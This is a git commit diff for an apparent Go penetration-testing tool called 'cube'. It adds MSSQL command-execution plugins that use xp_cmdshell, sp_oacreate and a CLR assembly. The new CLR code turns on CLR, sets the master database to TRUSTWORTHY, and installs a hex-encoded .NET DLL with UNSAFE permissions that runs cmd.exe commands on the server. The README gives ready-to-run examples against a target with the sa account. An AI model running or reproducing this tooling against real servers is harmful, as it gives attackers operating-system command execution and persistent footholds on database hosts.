Merge branch 'dev'

add mssql execute plugins: xp_cmdshell,oa_create,CLR

README.md

@@ -59,7 +59,26 @@ cube crack -u root --pass-file pass.txt -i http://192.168.1.1 -x jenkins
 sqlserver爆破密码的代码(Event Code): 18456
 
 #### Sqlcmd
-执行命令，可用插件： `ssh`
+执行命令，可用插件： `ssh`,`mssql`,`mssql-wscript`,`mssql-com`,`mssql-clr`
+```
+Examples:
+cube sqlcmd -x ssh://172.16.157.163:2222 -usa -p123456 -e "whoami"
+
+
+cube sqlcmd -x mssql://172.16.157.163 -usa -p123456 -e "whoami"
+cube sqlcmd -x mssql://172.16.157.163 -usa -p123456 -e "close" //close xp_cmdshell
+
+cube sqlcmd -x mssql-wscript://172.16.157.163 -usa -p123456 -e "whoami"
+cube sqlcmd -x mssql-wscript://172.16.157.163 -usa -p123456 -e "close" //close sp_oacreate
+
+
+cube sqlcmd -x mssql-com://172.16.157.163 -usa -p123456 -e "whoami"
+cube sqlcmd -x mssql-com://172.16.157.163 -usa -p123456 -e "close" //close sp_oacreate
+
+
+cube sqlcmd -x mssql-clr://172.16.157.163 -usa -p123456 -e "whoami"
+cube sqlcmd -x mssql-clr://172.16.157.163 -usa -p123456 -e "close" //close CLR
+```
 
 ### TODO
 ##### Probe模块：
@@ -72,7 +91,7 @@ https://github.com/checkymander/Sharp-SMBExec/blob/master/SharpInvoke-SMBExec/Pr
 
 
 - [ ] 增加输出CSV
-- [ ] 增加sqlcmd的mssql命令执行
+- [x] 增加sqlcmd的mssql命令执行
 - [x] 增加请求间隔延迟 --delay，当设定这个选项的时候，线程强制设为1，这个选项大概用不上？
 - [ ] 变量名和函数名优化、
 - [ ] 增加蜜罐识别：<https://www.secrss.com/articles/28577>

model/vars.go

@@ -43,7 +43,8 @@ func init() {
 	CommonPortMap["ms17010"] = 445
 	CommonPortMap["mssql"] = 1433
 	CommonPortMap["mssql-wscript"] = 1433
-	CommonPortMap["mssql_com"] = 1433
+	CommonPortMap["mssql-com"] = 1433
+	CommonPortMap["mssql-clr"] = 1433
 	CommonPortMap["zookeeper"] = 2181
 	CommonPortMap["mysql"] = 3306
 	CommonPortMap["postgres"] = 5432

plugins/plugins.go

@@ -39,9 +39,10 @@ func init() {
 
 	SqlcmdFuncMap = make(map[string]SqlcmdFunc)
 	SqlcmdFuncMap["ssh"] = sqlcmd.SshCmd
-	SqlcmdFuncMap["mssql1"] = sqlcmd.Mssql1Cmd
-	SqlcmdFuncMap["mssql-wscript"] = sqlcmd.Mssql2Cmd
-	SqlcmdFuncMap["mssql-com"] = sqlcmd.Mssql3Cmd
+	SqlcmdFuncMap["mssql"] = sqlcmd.Mssql
+	SqlcmdFuncMap["mssql-wscript"] = sqlcmd.MssqlWscript
+	SqlcmdFuncMap["mssql-com"] = sqlcmd.MssqlCom
+	SqlcmdFuncMap["mssql-clr"] = sqlcmd.MssqlClr
 
 	for k := range SqlcmdFuncMap {
 		SqlcmdKeys = append(SqlcmdKeys, k)

plugins/sqlcmd/mssql.go

@@ -9,7 +9,7 @@ import (
 	_ "github.com/denisenkom/go-mssqldb"
 )
 
-func Mssql1Cmd(task model.SqlcmdTask) (result model.SqlcmdTaskResult) {
+func Mssql(task model.SqlcmdTask) (result model.SqlcmdTaskResult) {
 	result = model.SqlcmdTaskResult{SqlcmdTask: task, Result: "", Err: nil}
 
 	dataSourceName := fmt.Sprintf("server=%v;port=%v;user id=%v;password=%v;database=%v", task.Ip,
@@ -107,5 +107,6 @@ func closeCmdShell(conn sql.DB) {
 	if err != nil {
 		log.Error("Prepare failed:", err.Error())
 	}
+	stmt.Query()
 	defer stmt.Close()
 }

plugins/sqlcmd/mssql_clr.go

@@ -1,4 +1,4 @@
-//From: https://github.com/mabangde/pentesttools/blob/master/golang/sqltool.go
+//From: https://zhuanlan.zhihu.com/p/33322584
 package sqlcmd
 
 import (
@@ -13,31 +13,89 @@ func MssqlClr(task model.SqlcmdTask) (result model.SqlcmdTaskResult) {
 	result = model.SqlcmdTaskResult{SqlcmdTask: task, Result: "", Err: nil}
 
 	dataSourceName := fmt.Sprintf("server=%v;port=%v;user id=%v;password=%v;database=%v", task.Ip,
-		task.Port, task.User, task.Password, "tempdb")
+		task.Port, task.User, task.Password, "master")
 	conn, err := sql.Open("mssql", dataSourceName)
 	defer conn.Close()
 	if err != nil {
 		log.Error(err.Error())
 	}
 	if task.Query == "close" {
-		closeOle(*conn)
-		fmt.Println("Close sp_oacreate Successful")
+		closeClr(*conn)
+		fmt.Println("Close mssql Clr Successful")
 		return
 	}
-	OpenOle(*conn)
-	osShellCom(*conn, task.Query)
+	v, err := conn.Prepare("select assembly_method from sys.assembly_modules;")
+	row := v.QueryRow()
+	var clrFlag string
+	row.Scan(&clrFlag)
+	if clrFlag == "run" {
+		shellClr(*conn, task.Query)
+	} else {
+		installClr(*conn)
+	}
 
 	return result
 }
 
+func installClr(conn sql.DB) {
+	value, err := conn.Prepare("select value_in_use from  sys.configurations where  name = 'clr enabled'")
+	if err != nil {
+		log.Error("Prepare failed:", err.Error())
+	}
+	defer value.Close()
+
+	row := value.QueryRow()
+	//var somenumber int64
+	var v int
+	err = row.Scan(&v)
+	if err != nil {
+		log.Error("Query failed:", err.Error())
+	}
+	if v == 1 {
+		fmt.Printf("Mssql Clr Enabled\n")
+	} else {
+		fmt.Printf("Open MssqlClr...\n")
+		stmt, err := conn.Prepare("EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'clr enabled', 1;RECONFIGURE;")
+		if err != nil {
+			//fmt.Println("Query Error", err)
+			return
+		}
+
+		defer stmt.Close()
+		stmt.Query()
+
+	}
+
+	//_, err = conn.Query("DROP ASSEMBLY CLR_module;")
+	//_, err = conn.Query("DROP PROCEDURE dbo.ClrExec;")
+
+	_, err = conn.Query("alter database [master] set trustworthy on;")
+	if err != nil {
+		log.Error("Set Trustworthy Error", err)
+		return
+	}
+
+	sqlInstall := fmt.Sprint("CREATE ASSEMBLY [CLR_module]\n    AUTHORIZATION [dbo]\n    FROM 0x4d5a90000300000004000000ffff0000b800000000000000400000000000000000000000000000000000000000000000000000000000000000000000800000000e1fba0e00b409cd21b8014ccd21546869732070726f6772616d2063616e6e6f742062652072756e20696e20444f53206d6f64652e0d0d0a2400000000000000504500004c01030029d16a5a0000000000000000e00022200b013000000a00000006000000000000be2800000020000000400000000000100020000000020000040000000000000004000000000000000080000000020000000000000300408500001000001000000000100000100000000000001000000000000000000000006c2800004f000000004000007c03000000000000000000000000000000000000006000000c000000342700001c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000200000080000000000000000000000082000004800000000000000000000002e74657874000000c408000000200000000a000000020000000000000000000000000000200000602e727372630000007c0300000040000000040000000c0000000000000000000000000000400000402e72656c6f6300000c0000000060000000020000001000000000000000000000000000004000004200000000000000000000000000000000a0280000000000004800000002000500c4200000700600000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000133003005f00000000000000730e00000a256f0f00000a026f1000000a256f0f00000a176f1100000a256f0f00000a166f1200000a256f0f00000a176f1300000a256f0f00000a176f1400000a256f0f00000a036f1500000a256f1600000a266f1700000a6f1800000a2a1e02281900000a2a0042534a4201000100000000000c00000076322e302e35303732370000000005006c00000020020000237e00008c020000ec02000023537472696e6773000000007805000004000000235553007c0500001000000023475549440000008c050000e400000023426c6f620000000000000002000001471500000900000000fa0133001600000100000013000000020000000200000002000000190000000d00000001000000020000000000a0010100000000000600f90054020600660154020600460022020f007402000006006e00b5010600dc00b5010600bd00b50106004d01b50106001901b50106003201b50106008500b50106005a0035020600380035020600a000b50106009902a9010a00830222020a00d90122020600ea010a000600f7010a000000000001000000000001000100010010001d00b0013d00010001005020000000009600c70135000100bb200000000086181c0206000300000001009801000002009c0109001c02010011001c02060019001c020a0029001c02100031001c02100039001c02100041001c02100049001c02100051001c02100059001c02100061001c02150069001c02100071001c02100081001c0206008100cb011a0089002b0010008900d90215008900840115008900be02150089000202150089008b0210008100a0021f008100ab02230099002100280079001c0206002e000b003b002e00130044002e001b0063002e0023006c002e002b0076002e00330076002e003b007c002e0043006c002e004b008b002e00530076002e005b0076002e006300ac002e006b00d600048000000100000000000000000000000000a60200000200000000000000000000002c001400000000000200000000000000000000002c00a901000000000000003c4d6f64756c653e0053797374656d2e494f006d73636f726c696200636d640052656164546f456e64007365745f46696c654e616d6500477569644174747269627574650044656275676761626c6541747472696275746500436f6d56697369626c6541747472696275746500417373656d626c795469746c6541747472696275746500417373656d626c7954726164656d61726b41747472696275746500417373656d626c7946696c6556657273696f6e41747472696275746500417373656d626c79436f6e66696775726174696f6e41747472696275746500417373656d626c794465736372697074696f6e41747472696275746500436f6d70696c6174696f6e52656c61786174696f6e7341747472696275746500417373656d626c7950726f6475637441747472696275746500417373656d626c79436f7079726967687441747472696275746500417373656d626c79436f6d70616e794174747269627574650052756e74696d65436f6d7061746962696c697479417474726962757465007365745f5573655368656c6c45786563757465006578650061726700746573742e646c6c0053797374656d006c75616e0053797374656d2e5265666c656374696f6e0072756e006765745f5374617274496e666f0050726f636573735374617274496e666f0053747265616d5265616465720054657874526561646572007365745f52656469726563745374616e646172644572726f72002e63746f720053797374656d2e446961676e6f73746963730053797374656d2e52756e74696d652e496e7465726f7053657276696365730053797374656d2e52756e74696d652e436f6d70696c6572536572766963657300446562756767696e674d6f6465730050726f63657373007365745f417267756d656e7473004f626a6563740053746172740074657374006765745f5374616e646172644f7574707574007365745f52656469726563745374616e646172644f7574707574007365745f4372656174654e6f57696e646f770000000000e388bea52dd89b46bc54e92695a9106b00042001010803200001052001011111042001010e042001010204200012450320000204200012490320000e08b77a5c561934e0890500020e0e0e0801000800000000001e01000100540216577261704e6f6e457863657074696f6e5468726f777301080100020000000000090100047465737400000501000000000e0100094d6963726f736f667400002001001b436f7079726967687420c2a9204d6963726f736f6674203230313800002901002434363864653931652d356661622d346431632d613639392d31323937343038343437663700000c010007312e302e302e300000000000000029d16a5a00000000020000001c010000502700005009000052534453c5a291c391233540a57b8322a05f0d8601000000443a5c615c7270635c746573745c746573745c6f626a5c52656c656173655c746573742e7064620000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000942800000000000000000000ae280000002000000000000000000000000000000000000000000000a0280000000000000000000000005f436f72446c6c4d61696e006d73636f7265652e646c6c0000000000ff25002000100000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000100100000001800008000000000000000000000000000000100010000003000008000000000000000000000000000000100000000004800000058400000200300000000000000000000200334000000560053005f00560045005200530049004f004e005f0049004e0046004f0000000000bd04effe00000100000001000000000000000100000000003f000000000000000400000002000000000000000000000000000000440000000100560061007200460069006c00650049006e0066006f00000000002400040000005400720061006e0073006c006100740069006f006e00000000000000b00480020000010053007400720069006e006700460069006c00650049006e0066006f0000005c02000001003000300030003000300034006200300000001a000100010043006f006d006d0065006e007400730000000000000034000a00010043006f006d00700061006e0079004e0061006d006500000000004d006900630072006f0073006f00660074000000320005000100460069006c0065004400650073006300720069007000740069006f006e0000000000740065007300740000000000300008000100460069006c006500560065007200730069006f006e000000000031002e0030002e0030002e003000000032000900010049006e007400650072006e0061006c004e0061006d006500000074006500730074002e0064006c006c00000000005a001b0001004c006500670061006c0043006f007000790072006900670068007400000043006f0070007900720069006700680074002000a90020004d006900630072006f0073006f006600740020003200300031003800000000002a00010001004c006500670061006c00540072006100640065006d00610072006b00730000000000000000003a00090001004f0072006900670069006e0061006c00460069006c0065006e0061006d006500000074006500730074002e0064006c006c00000000002a0005000100500072006f0064007500630074004e0061006d00650000000000740065007300740000000000340008000100500072006f006400750063007400560065007200730069006f006e00000031002e0030002e0030002e003000000038000800010041007300730065006d0062006c0079002000560065007200730069006f006e00000031002e0030002e0030002e003000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000002000000c000000c03800000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000\n    WITH PERMISSION_SET = UNSAFE;")
+	_, err = conn.Query(sqlInstall)
+	if err != nil {
+		log.Error("Create Assembly Error", err)
+	}
+
+	//sqlInstall2 := fmt.Sprint("CREATE PROCEDURE [dbo].[ClrExec]\n@cmd NVARCHAR (MAX)\nAS EXTERNAL NAME [CLR_module].[StoredProcedures].[ClrExec]")
+	sqlInstall2 := fmt.Sprint("CREATE FUNCTION dbo.ClrExec(@exe as nvarchar(MAX),@arg as nvarchar(MAX))RETURNS nvarchar(MAX) AS EXTERNAL NAME CLR_module.[luan.cmd].run")
+
+	_, err = conn.Query(sqlInstall2)
+	if err != nil {
+		log.Error("Create Function Error", err)
+	}
+}
+
 func shellClr(conn sql.DB, cmd string) {
-	sqlstr := fmt.Sprint("declare @shell int,@exec int,@text int,@str varchar(8000); \n" +
-		"exec sp_oacreate '{72C24DD5-D70A-438B-8A42-98424B88AFB8}',@shell output\nexec sp_oamethod @shell,'exec',@exec output,'c:\\windows\\system32\\cmd.exe /c " + cmd + "'\nexec sp_oamethod @exec, 'StdOut', @text out;\nexec sp_oamethod @text, 'ReadAll', @str out\nselect @str")
-	log.Debug(sqlstr)
+	sqlstr := fmt.Sprint("select dbo.ClrExec('C:\\Windows\\System32\\cmd.exe', '/c " + cmd + "')")
+	//fmt.Println(sqlstr)
 	rows, err := conn.Query(sqlstr)
 	if err != nil {
 		panic(err.Error())
-
 	}
 	defer rows.Close()
 
@@ -74,10 +132,11 @@ func shellClr(conn sql.DB, cmd string) {
 }
 
 func closeClr(conn sql.DB) {
-	stmt, err := conn.Prepare("EXEC sp_configure 'show advanced options', 0;RECONFIGURE;EXEC sp_configure 'Ole Automation Procedures', 0;RECONFIGURE;")
+	stmt, err := conn.Prepare("DROP FUNCTION dbo.ClrExec;DROP ASSEMBLY CLR_module;")
 
 	if err != nil {
 		log.Error("Prepare failed:", err.Error())
 	}
+	stmt.Query()
 	defer stmt.Close()
 }

plugins/sqlcmd/mssql_com.go

@@ -9,7 +9,7 @@ import (
 	_ "github.com/denisenkom/go-mssqldb"
 )
 
-func Mssql3Cmd(task model.SqlcmdTask) (result model.SqlcmdTaskResult) {
+func MssqlCom(task model.SqlcmdTask) (result model.SqlcmdTaskResult) {
 	result = model.SqlcmdTaskResult{SqlcmdTask: task, Result: "", Err: nil}
 
 	dataSourceName := fmt.Sprintf("server=%v;port=%v;user id=%v;password=%v;database=%v", task.Ip,
@@ -72,12 +72,3 @@ func osShellCom(conn sql.DB, cmd string) {
 		panic(err.Error()) // proper error handling instead of panic in your app
 	}
 }
-
-func closeCom(conn sql.DB) {
-	stmt, err := conn.Prepare("EXEC sp_configure 'show advanced options', 0;RECONFIGURE;EXEC sp_configure 'Ole Automation Procedures', 0;RECONFIGURE;")
-
-	if err != nil {
-		log.Error("Prepare failed:", err.Error())
-	}
-	defer stmt.Close()
-}

plugins/sqlcmd/mssql_wscript.go

@@ -9,7 +9,7 @@ import (
 	_ "github.com/denisenkom/go-mssqldb"
 )
 
-func Mssql2Cmd(task model.SqlcmdTask) (result model.SqlcmdTaskResult) {
+func MssqlWscript(task model.SqlcmdTask) (result model.SqlcmdTaskResult) {
 	result = model.SqlcmdTaskResult{SqlcmdTask: task, Result: "", Err: nil}
 
 	dataSourceName := fmt.Sprintf("server=%v;port=%v;user id=%v;password=%v;database=%v", task.Ip,
@@ -110,5 +110,7 @@ func closeOle(conn sql.DB) {
 	if err != nil {
 		log.Error("Prepare failed:", err.Error())
 	}
+	stmt.Query()
 	defer stmt.Close()
+
 }

plugins/sqlcmd/ssh_test.go

@@ -14,8 +14,8 @@ func TestSshCmd(t *testing.T) {
 }
 
 func TestMssql3Cmd(t *testing.T) {
-	task := model.SqlcmdTask{Ip: "172.16.157.163", User: "sa", Password: "123456aa", SqlcmdPlugin: "mssql3", Query: "whoami"}
+	task := model.SqlcmdTask{Ip: "172.16.157.163", User: "sa", Password: "123456aa", SqlcmdPlugin: "mssql-clr", Query: "tasklist"}
 	//fmt.Println(SshCmd(task))
-	r := Mssql3Cmd(task)
+	r := MssqlClr(task)
 	fmt.Println(r.Result)
 }